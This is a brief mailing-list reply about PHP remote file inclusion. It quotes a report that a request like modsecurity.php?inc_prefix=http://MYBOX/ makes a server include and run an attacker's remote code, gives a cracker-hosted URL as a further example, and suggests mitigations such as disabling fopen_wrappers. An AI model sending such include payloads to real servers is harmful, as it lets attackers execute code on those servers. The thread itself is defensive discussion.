Just as a side note, quite a lot of sites are open to this kind of attacks, namely including files from other servers. fopen_wrappers and unsafe programming are to blame here. Lots of scripts do include($file); // $file is in GPC So if $file is "http://www.cracker.com/somefile.php"; that file gets included, and php code in it gets executed. Easy workaround: disable fopen_wrappers in php.ini, or call file_exists before including any file. if (file_exists($file)) include($file); Of course, the only "real" way to fix the bug is to program safely. On 9/23/2002 1:53 AM Tim Vandermeersch wrote: > If someone request a URL like > http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, > the htmlheader.php file from MYBOX would be included, > and the attacker would be able to include any code he > wants.
